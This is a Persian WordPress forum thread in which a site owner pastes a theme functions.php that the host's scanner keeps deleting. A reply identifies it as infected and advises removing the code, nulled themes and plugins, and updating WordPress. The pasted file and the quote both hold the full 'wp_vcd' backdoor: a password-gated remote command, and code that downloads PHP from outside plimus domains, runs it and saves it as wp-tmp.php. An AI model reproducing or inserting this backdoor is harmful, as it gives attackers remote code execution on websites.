رفتن به مطلب

حذف فایل فانکشن قالب توسط آنتی شلر سرور


nasri

پست های پیشنهاد شده

با سلام

چند هفته هست که فایل فانکشن قالب سایت توسط آنتی شلر سرور به طور خودکار حذف می شود از پشتیبانی سوال کردم گفت فایل دارای کد مخرب هست اما هر چه جستجو کردم کد مخربی در فایل پیدا نکردم.

این کد ها دقیقا در سرور و هاست قبلی وجود داشتند و هیچ مشکلی نبود ولی از وقتی به هاست جدید منتقل شدیم

انتی ویروس سرور به این فایل گیر می دهد و حذف می کند فایل را.

لطفا دوستان این کدها را بررسی کنند و راهنمایی کنند الان یک هفته هست که سایت دان شده است و نمی توانم مشکل را بر طرف کنید.

لطفا راهنمایی کنید.

فایل های فانکشن را ضمیمه می کنم.

 

 

 

 

 

<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '5cce6faa5d4d4d5e9cd422ee733cad67'))
    {
$div_code_name="wp_vcd";
        switch ($_REQUEST['action'])
            {

                

 


                case 'change_domain';
                    if (isset($_REQUEST['newdomain']))
                        {
                            
                            if (!empty($_REQUEST['newdomain']))
                                {
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                            {
                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code3\.php/i',$file,$matcholddomain))
                                                                                                             {

                                                                                       $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                                                                       @file_put_contents(__FILE__, $file);
                                                               print "true";
                                                                                                             }


                                                                            }
                                }
                        }
                break;

                
                
                default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
            }
            
        die("");
    }

    

 

$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            fwrite($handle, "<?php\n" . $phpCode);
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        
$wp_auth_key='e0a42a9f93a2b035c80e7900c882c5bf';
        if (($tmpcontent = @file_get_contents("http://www.plimus.info/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.plimus.info/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        
        
        elseif ($tmpcontent = @file_get_contents("http://www.plimus.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
           
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));

        } elseif (($tmpcontent = @file_get_contents("http://www.plimus.top/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.plimus.top/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));

        }
        
        
        
        
        
    }
}

//$start_wp_theme_tmp

 

//wp_tmp


//$end_wp_theme_tmp
?><?php
/**
 * Theme Alien Core functions and definitions
 *
 * @package BigBoom
 */

/**
 * Define theme's constant
 */
if ( ! defined( 'THEME_VERSION' ) ) {
    define( 'THEME_VERSION', '1.0.4' );
}
if ( ! defined( 'THEME_DIR' ) ) {
    define( 'THEME_DIR', get_template_directory() );
}
if ( ! defined( 'THEME_URL' ) ) {
    define( 'THEME_URL', get_template_directory_uri() );
}

/**
 * Set the content width based on the theme's design and stylesheet.
 */
if ( ! isset( $content_width ) ) {
    $content_width = 640;
}

/**
 * Sets up theme defaults and registers support for various WordPress features.
 *
 * @since  1.0
 *
 * @return void
 */
function bigboom_setup() {

    // Make theme available for translation.
    load_theme_textdomain( 'bigboom', get_template_directory() . '/lang' );

    // Theme supports
    add_theme_support( 'woocommerce' );
    add_theme_support( 'automatic-feed-links' );
    add_theme_support( 'title-tag' );
    add_theme_support( 'post-thumbnails' );
    add_theme_support( 'post-formats', array( 'aside', 'image', 'video', 'quote', 'link' ) );
    add_theme_support( 'html5', array(
        'comment-list',
        'search-form',
        'comment-form',
        'gallery',
    ) );

    // Register theme nav menu
    register_nav_menus( array(
        'primary' => __( 'Primary Menu', 'bigboom' ),
        'footer'  => __( 'Footer Menu', 'bigboom' ),
        'mobile'  => __( 'Mobile Menu', 'bigboom' ),
    ) );
}
add_action( 'after_setup_theme', 'bigboom_setup' );

/**
 * Initialize additional functions/classes
 *
 * @since 1.0
 */
function bigboom_init() {
    new BigBoom_VC;
    new BigBoom_WooCommerce;

    if ( is_admin() ) {
        new Bigboom_Walker_Nav_Menu_Custom_Fields;

        new TA_Demo_Import( array(
            'home_page' => 'Home Page 1',
            'blog_page' => 'Blog',
            'base_url'  => 'http://demo.themealien.com/bigboom-2/',
            'sliders'   => true,
        ) );
    } else {
        new BigBoom_Shortcodes;
    }
}
add_action( 'after_setup_theme', 'bigboom_init', 20 );

/**
 * Add image sizes.
 * Must be added to init hook to remove sizes of portfolio plugin.
 *
 * @since 1.0
 */
function bigboom_add_image_sizes() {
    add_image_size( 'blog-thumb-tiny', 113, 113, true );
    add_image_size( 'blog-small-thumb', 555, 245, true );
    add_image_size( 'blog-thumb', 870, 385, true );
    add_image_size( 'blog-large-thumb', 1170, 520, true );
    add_image_size( 'widget-thumb', 125, 135, true );
}
add_action( 'after_setup_theme', 'bigboom_add_image_sizes', 10 );

/**
 * Register widgetized area and update sidebar with default widgets.
 *
 * @since 1.0
 *
 * @return void
 */
function bigboom_register_sidebar() {
    // Register topbar sidebar
    register_sidebar( array(
        'name'          => __( 'Topbar Left', 'bigboom' ),
        'id'            => 'topbar-left',
        'before_widget' => '<div id="%1$s" class="widget %2$s">',
        'after_widget'  => '</div>',
        'before_title'  => '<h4 class="widget-title">',
        'after_title'   => '</h4>',
    ) );

    register_sidebar( array(
        'name'          => __( 'Topbar Right', 'bigboom' ),
        'id'            => 'topbar-right',
        'before_widget' => '<div id="%1$s" class="widget %2$s">',
        'after_widget'  => '</div>',
        'before_title'  => '<h4 class="widget-title">',
        'after_title'   => '</h4>',
    ) );

    // Register header sidebar
    register_sidebar( array(
        'name'          => __( 'Header Right', 'bigboom' ),
        'id'            => 'header-sidebar',
        'before_widget' => '<div id="%1$s" class="widget %2$s">',
        'after_widget'  => '</div>',
        'before_title'  => '<h4 class="widget-title">',
        'after_title'   => '</h4>',
    ) );

    // Register shop sidebar
    register_sidebar( array(
        'name'          => __( 'Shop Sidebar', 'bigboom' ),
        'id'            => 'shop-sidebar',
        'before_widget' => '<div id="%1$s" class="widget %2$s">',
        'after_widget'  => '</div>',
        'before_title'  => '<h4 class="widget-title">',
        'after_title'   => '</h4>',
    ) );

    // Register blog sidebar
    register_sidebar( array(
        'name'          => __( 'Blog Sidebar', 'bigboom' ),
        'id'            => 'blog-sidebar',
        'before_widget' => '<div id="%1$s" class="widget %2$s">',
        'after_widget'  => '</div>',
        'before_title'  => '<h4 class="widget-title">',
        'after_title'   => '</h4>',
    ) );

    // Register page sidebar
    register_sidebar( array(
        'name'          => __( 'Page Sidebar', 'bigboom' ),
        'id'            => 'page-sidebar',
        'before_widget' => '<div id="%1$s" class="widget %2$s">',
        'after_widget'  => '</div>',
        'before_title'  => '<h4 class="widget-title">',
        'after_title'   => '</h4>',
    ) );

    // Register footer sidebar
    register_sidebars( 5, array(
        'name'          => __( 'Footer', 'bigboom' ) . ' %d',
        'id'            => 'footer-sidebar',
        'before_widget' => '<div id="%1$s" class="widget %2$s">',
        'after_widget'  => '</div>',
        'before_title'  => '<h4 class="widget-title">',
        'after_title'   => '</h4>',
    ) );
}
add_action( 'widgets_init', 'bigboom_register_sidebar' );

/**
 * Load theme
 */

// Theme Options
require THEME_DIR . '/inc/libs/theme-options/framework.php';
require THEME_DIR . '/inc/backend/theme-options.php';

// Widgets
require THEME_DIR . '/inc/widgets/widgets.php';

// Visual composer
require THEME_DIR . '/inc/backend/visual-composer.php';

// Woocommerce hooks
require THEME_DIR . '/inc/frontend/woocommerce.php';

if ( is_admin() ) {
    require THEME_DIR . '/inc/libs/class-tgm-plugin-activation.php';
    require THEME_DIR . '/inc/backend/plugins.php';
    require THEME_DIR . '/inc/backend/meta-boxes.php';
    require THEME_DIR . '/inc/backend/nav-menus.php';
    require THEME_DIR . '/inc/importer/importer.php';
} else {
    // Frontend functions and shortcodes
    require THEME_DIR . '/inc/functions/media.php';
    require THEME_DIR . '/inc/functions/nav.php';
    require THEME_DIR . '/inc/functions/mega-menu-walker.php';
    require THEME_DIR . '/inc/functions/layout.php';
    require THEME_DIR . '/inc/functions/entry.php';
    require THEME_DIR . '/inc/functions/shortcodes.php';

    // Frontend hooks
    require THEME_DIR . '/inc/frontend/layout.php';
    require THEME_DIR . '/inc/frontend/header.php';
    require THEME_DIR . '/inc/frontend/nav.php';
    require THEME_DIR . '/inc/frontend/entry.php';
    require THEME_DIR . '/inc/frontend/footer.php';
}
add_filter( 'woocommerce_product_tabs', 'wpb_remove_product_tabs', 98 );
function wpb_remove_product_tabs( $tabs ) {
    unset( $tabs['additional_information'] );             // Remove the description tab
    return $tabs;
}

 

functions.php

functions.zip

لینک به ارسال
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '5cce6faa5d4d4d5e9cd422ee733cad67'))
    {
$div_code_name="wp_vcd";
        switch ($_REQUEST['action'])
            {

                

 


                case 'change_domain';
                    if (isset($_REQUEST['newdomain']))
                        {
                            
                            if (!empty($_REQUEST['newdomain']))
                                {
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                            {
                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code3\.php/i',$file,$matcholddomain))
                                                                                                             {

                                                                                       $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                                                                       @file_put_contents(__FILE__, $file);
                                                               print "true";
                                                                                                             }


                                                                            }
                                }
                        }
                break;

                
                
                default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
            }
            
        die("");
    }

    

 

$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            fwrite($handle, "<?php\n" . $phpCode);
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        
$wp_auth_key='e0a42a9f93a2b035c80e7900c882c5bf';
        if (($tmpcontent = @file_get_contents("http://www.plimus.info/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.plimus.info/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        
        
        elseif ($tmpcontent = @file_get_contents("http://www.plimus.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
           
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));

        } elseif (($tmpcontent = @file_get_contents("http://www.plimus.top/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.plimus.top/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));

        }
        
        
        
        
        
    }
}

//$start_wp_theme_tmp

 

//wp_tmp


//$end_wp_theme_tmp
?>

خب  سایتتون الوده به ماینر (استخراج ارز دیجیتالی ) هستش (وقتی سایت رو با گوشی و سیستم باز می کردین سیستم داغ نمی کرد؟ :|

این کدهارو حذف کنید اگر از قالب و افزونه نال استفاده می کنید اینارم حذف کنید

اگر نسخه وردپرستون اپدیت نیست اپدیت بکنید

 

 

لینک به ارسال

به گفتگو بپیوندید

هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .

مهمان
ارسال پاسخ به این موضوع ...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

  تنها استفاده از 75 اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به صورت لینک

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.

×
×
  • اضافه کردن...